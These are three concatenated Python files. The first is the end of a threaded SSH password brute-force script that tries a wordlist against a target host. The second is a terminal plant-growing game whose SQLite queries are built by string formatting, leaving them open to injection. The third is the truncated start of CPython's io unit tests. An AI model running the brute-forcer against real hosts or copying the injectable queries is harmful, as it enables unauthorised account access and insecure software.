ssh.connect(host, port=22, username=username, password=password)
stop_flag = 1
print(termcolor.colored(('[+] Found Password: ' + password + ', For Account: ' + username), 'green'))
except:
print(termcolor.colored(('[-] Incorrect Login: ' + password), 'red'))
ssh.close()
host = input('[+] Enter Target Address: ')
username = input('[+] SSH username: ')
input_file = input('[+] Passwords file: ')
print('Trying to connect...\n')
# check if file exists
if not os.path.exists(input_file):
print('[!!] That file/Path does not exist')
sys.exit(1)
print(termcolor.colored(('* * * Starting Threaded SSH bruteforce on ' + host + ' with Account: ' + username + ' * * *'), 'blue'))
with open(input_file, 'r') as file:
for line in file.readlines():
if stop_flag == 1:
t.join()
exit()
password = line.strip()
t = threading.Thread(target=ssh_connect, args=(password,))
t.start()
time.sleep(0.5)
|
botany.py
|
#!/usr/bin/env python3
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
'cursed',
'buff',
'narcotic',
'gnu/linux',
'abraxan', # rip dear friend
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2/3)*CONST_RARITY_MAX)
uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
for name in (visitor_names):
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name))
data=c.fetchone()
if data is None:
sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name)
c.execute(sql)
else:
sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name)
c.execute(sql)
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] <= int(time.time()):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0o666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
# TODO: this considers a plant watered only on day 1 and day 4 to be
# watered for all 4 days - need to figure out how to only add score
# from 24h after each watered timestamp
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Increase plant growth stage
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_watered = this_plant.water_check()
is_dead = this_plant.dead_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0o777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0o666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0o666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# try to insert or replace
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (
'{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead}
)
""".format(pid = this_plant.plant_id,
pown = this_plant.owner,
pdes = this_plant.parse_plant(),
page = age_formatted,
psco = str(this_plant.ticks),
pdead = int(this_plant.dead))
c.execute(update_query)
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
try:
botany_menu = CursedMenu(my_plant,my_data)
my_data.save_plant(my_plant)
my_data.data_write_json(my_plant)
my_data.update_garden_db(my_plant)
finally:
cleanup()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.script_helper import assert_python_ok
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
self.assertRaises(TypeError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
